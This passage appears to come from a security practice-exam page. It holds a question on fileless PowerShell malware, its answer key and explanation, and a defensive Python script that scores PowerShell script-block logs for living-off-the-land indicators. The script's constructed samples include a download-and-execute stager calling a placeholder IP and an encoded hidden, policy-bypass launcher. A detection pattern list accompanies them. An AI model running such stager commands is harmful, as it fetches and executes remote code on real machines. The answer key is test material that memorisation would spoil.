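if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The point the question is testing is visible in `after_expiry` and `other_user`: a credential is not enough, because privilege is a short-lived grant bound to a ticket and an MFA event rather than an attribute of the account. The denials are logged as well as the grants, which is what lets a SOC correlate "attempted use of a privileged role with no active grant" against EDR or network alerts, as the explanation describes.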
Question 100
A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IP addresses. Antivirus scans do not detect any malicious files. Which of the following BEST describes the threat?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware resides primarily in memory and uses legitimate administrative tools such as PowerShell, WMI, or Office macros to perform malicious actions, leaving minimal traces on disk. The scenario describes obfuscated scripts communicating with external IP addresses, indicative of an attacker leveraging living-off-the-land (LotL) techniques to execute tasks such as data exfiltration, lateral movement, privilege escalation, or command-and-control communication.
Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory forensics. Analysts should look for anomalies such as unusual process execution, unexpected network connections, abnormal script behavior, and deviations from baseline activity. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts for malicious intent, and remediating compromised systems. Preventive measures include application whitelisting, enforcing least privilege, enabling PowerShell logging (module logging, script block logging, transcription), restricting script execution policies, network segmentation, and leveraging threat intelligence to block communication with known malicious IP addresses or domains.
Living-off-the-land attacks are particularly challenging because they exploit legitimate tools, making signature-based detection largely ineffective. A layered defense combining proactive monitoring, robust endpoint security, least privilege enforcement, and employee training is essential for minimizing the risk and impact of fileless malware attacks. Organizations should also maintain incident response procedures and forensic capabilities to respond effectively when such threats are identified.
B Standard ransomware encrypting files
Ransomware involves file encryption and ransom notes, which differs from memory-resident malicious script execution.
C Phishing emails delivering malicious attachments
While phishing may be an initial delivery method, the ongoing obfuscated execution indicates post-compromise activity typical of fileless malware.
D Distributed denial-of-service (DDoS) attack
DDoS attacks focus on service disruption and do not involve memory-resident scripts or external command-and-control communications.
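The explanations for Questions 92, 95 and 100 all point at PowerShell logging (module logging, script block logging, transcription) as the visibility that antivirus lacks. As an added example of what an analyst does with that data, the following triage script scores the ScriptBlockText of the kind recorded by script block logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) for well-known living-off-the-land indicators and decodes any Base64 literal passed to FromBase64String so the inner command is scored too. This is illustration code written for this page, not any product's detection rule; the sample script blocks, the indicator weights and the threshold are constructed and assumed, and the encoded sample is built at import time from a harmless command.

```python
import base64
import binascii
import re

# Constructed script-block texts standing in for the ScriptBlockText field of
# Event ID 4104. None are real incident data; the encoded sample is built from
# a harmless command so the decoding step can be demonstrated.
_INNER = "Invoke-Expression 'Get-Date'"
_B64 = base64.b64encode(_INNER.encode("utf-16le")).decode("ascii")

SAMPLE_4104_EVENTS = {
    "benign_admin": r"Get-ChildItem -Path C:\Logs -Recurse | Where-Object { $_.Length -gt 1MB } | Select-Object FullName, Length",
    "benign_download": r"Invoke-WebRequest -Uri https://example.com/report.json -OutFile C:\Temp\report.json",
    "encoded_launcher": (
        "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -Command "
        f"\"$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('{_B64}'));IEX $s\""
    ),
    "stager_style": r"$w=New-Object Net.WebClient;$c=$w.DownloadString('http://203.0.113.10/a');IEX $c",
}

# (label, weight, pattern). Weights are assumed tuning values for this example.
INDICATORS = [
    ("encoded-command switch", 2, r"(?i)-(?:enc|encodedcommand|ec)\b"),
    ("base64 decode", 2, r"(?i)FromBase64String"),
    ("invoke-expression", 2, r"(?i)\b(?:IEX|Invoke-Expression)\b"),
    ("download cradle", 2, r"(?i)(?:Net\.WebClient|DownloadString|DownloadFile)\b"),
    ("web request", 1, r"(?i)\b(?:Invoke-WebRequest|IWR)\b"),
    ("hidden window", 1, r"(?i)-(?:w|windowstyle)\s+hidden"),
    ("no profile", 1, r"(?i)-(?:nop|noprofile)\b"),
    ("execution policy bypass", 2, r"(?i)-(?:ep|ex|executionpolicy)\s+bypass"),
    ("long base64-like token", 1, r"[A-Za-z0-9+/=]{40,}"),
]
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def decode_base64_literals(text: str) -> list:
    """Recover UTF-16LE payloads handed to FromBase64String so the inner command
    can be inspected; malformed literals are skipped rather than raising."""
    decoded = []
    for literal in B64_LITERAL.findall(text):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-16le", errors="replace"))
        except (binascii.Error, ValueError):
            continue
    return decoded


def _scan(text: str, prefix: str = "") -> tuple:
    hits, score = [], 0
    for label, weight, pattern in INDICATORS:
        if re.search(pattern, text):
            hits.append(prefix + label)
            score += weight
    return hits, score


def triage_script_block(text: str, threshold: int = 4) -> dict:
    """Score one script block; the threshold is an assumed value that keeps a
    lone Invoke-WebRequest below the line while stacked indicators cross it."""
    hits, score = _scan(text)
    for inner in decode_base64_literals(text):
        inner_hits, inner_score = _scan(inner, prefix="decoded:")
        hits += inner_hits
        score += inner_score
    verdict = "suspicious" if score >= threshold else "benign"
    return {"score": score, "indicators": hits, "verdict": verdict}


if __name__ == "__main__":
    for name, block in SAMPLE_4104_EVENTS.items():
        result = triage_script_block(block)
        print(f"{name}: {result['verdict']} (score {result['score']}) {result['indicators']}")
```

The weighting is deliberately additive: a single download or web request is routine administration, while hidden-window, execution-policy-bypass, Base64-decode and Invoke-Expression stacked in one block is the profile the question describes. Decoding the literal matters because script block logging records what was executed, but an encoded launcher only shows its intent once the inner text is recovered; none of this is visible to a file-based antivirus scan, which is why the answer is fileless malware rather than ransomware or a simple phishing delivery.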